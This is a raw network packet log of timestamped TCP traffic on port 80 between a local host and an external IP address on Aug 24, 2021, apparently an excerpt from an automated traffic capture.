Aug 24, 2021 08:49:15.104954958 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.104963064 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.104984045 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.104999065 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.104999065 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.105022907 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.105045080 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.105048895 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.105065107 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.105081081 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.105088949 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.105103016 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.105115891 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.105128050 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.105150938 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.105180025 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.105191946 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.105205059 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.105227947 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.105228901 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.105263948 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.105288029 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.105288029 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.105312109 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.105333090 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.105340958 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.105353117 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.105386019 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.105401039 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.105406046 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.105426073 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.105433941 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.105443954 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.105467081 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.105472088 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.105489016 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.105509996 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.105513096 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.105530977 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.105547905 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.105559111 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.105562925 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.105585098 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.105587006 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.105607986 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.105622053 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.105633020 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.105652094 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.105671883 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.105674982 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.105693102 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.105711937 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.105712891 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.105729103 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.105746031 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.105762005 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.105773926 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.105781078 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.105798960 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.105814934 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.105814934 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.105833054 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.105849028 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.105864048 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.105864048 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.105880976 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.105894089 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.105896950 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.105916023 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.105932951 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.105932951 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.105951071 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.105959892 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.105967999 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.105983973 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.105998039 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106009960 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.106014967 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106030941 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106046915 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.106049061 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106067896 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106075048 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.106086016 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106095076 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.106102943 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106118917 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106131077 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.106134892 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106152058 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106164932 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.106165886 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106185913 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106189013 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.106204033 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106219053 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106235027 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106240988 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.106257915 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106261969 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106273890 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106275082 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.106287003 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106298923 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106314898 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106328964 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106342077 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.106344938 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106364012 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106380939 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106383085 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.106396914 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106405020 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.106414080 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106434107 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106441975 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.106452942 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106473923 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106476068 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.106493950 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106515884 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106519938 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.106538057 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106555939 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.106558084 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106578112 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106597900 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106601954 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.106618881 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106637001 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106650114 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.106651068 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106673956 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106674910 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.106695890 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106715918 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106729031 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.106736898 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106760979 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106770992 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.106786013 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106797934 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.106807947 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106827974 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106848001 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106853008 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.106870890 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106885910 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.106892109 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106913090 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106933117 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106934071 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.106956959 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.106976032 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.106980085 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.107002974 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.107019901 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.107023001 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.107044935 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.107062101 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.107069016 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.107091904 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.107110023 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.107111931 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.107153893 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.107167959 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.107177973 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.107198000 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.107218027 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.107220888 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.107239962 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.107258081 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.107259035 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.107291937 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.107311964 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.107316017 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.107331038 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.107353926 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.107355118 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.107374907 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.107392073 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.107394934 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.107415915 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.107434988 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.107436895 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.107453108 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.107472897 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.107475042 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.107491970 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.107515097 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.107516050 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.107534885 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.107553959 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.107557058 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.107573032 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.107590914 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.107594013 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.107613087 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.107630968 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.107634068 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.107651949 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.107673883 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.107673883 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.107696056 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.107713938 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.107717037 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.107738018 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.107750893 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.107752085 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:15.107760906 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.107795954 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:15.109179974 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:16.157567024 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:16.157694101 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:16.180610895 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:16.207091093 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:16.237241983 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:16.237442017 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:16.259555101 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:16.284636021 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:16.298228025 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:16.298260927 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:16.320400000 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:16.347091913 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:16.402312994 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:16.418983936 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:16.419013977 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:16.441589117 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:16.472234011 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:16.484957933 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:16.485019922 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:16.510241985 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:16.536012888 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:16.589837074 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:16.620024920 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:16.620098114 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:16.643238068 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:16.671252966 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:16.700203896 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:16.700289965 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:16.723817110 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:16.748431921 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:16.789232016 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:16.789267063 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:16.811460018 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:16.835613966 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:16.846986055 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:16.847038031 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:16.869280100 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:16.893894911 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:16.937500954 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:16.937849045 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:16.959873915 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:16.983211040 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:16.990592003 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:16.990659952 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.012813091 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.044471025 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.067173958 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.067215919 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.089401007 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.169482946 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.169516087 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.169528961 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.169540882 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.169553995 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.169572115 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.169585943 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.169604063 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.169625044 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.169644117 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.169647932 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.169661999 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.169682980 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.169687033 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.169702053 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.169712067 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.169718981 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.169733047 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.169739008 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.169780016 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.192764997 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.192795038 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.192811966 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.192828894 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.192845106 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.192862034 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.192863941 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.192876101 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.192893982 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.192909002 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.192912102 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.192930937 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.192940950 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.192948103 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.192958117 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.192969084 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.192986965 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.192996025 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.193005085 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.193022966 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.193039894 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.193052053 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.193057060 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.193073988 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.193085909 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.193090916 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.193104029 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.193110943 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.193130970 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.193140984 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.193146944 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.193164110 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.193172932 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.193180084 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.193197012 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.193212986 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.193218946 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.193229914 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.193243027 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.193249941 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.193267107 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.193276882 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.193284035 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.193327904 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.215595961 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.215621948 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.215636015 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.215653896 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.215667009 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.215684891 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.215701103 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.215708017 CEST	49712	80	192.168.2.5	212.224.105.79
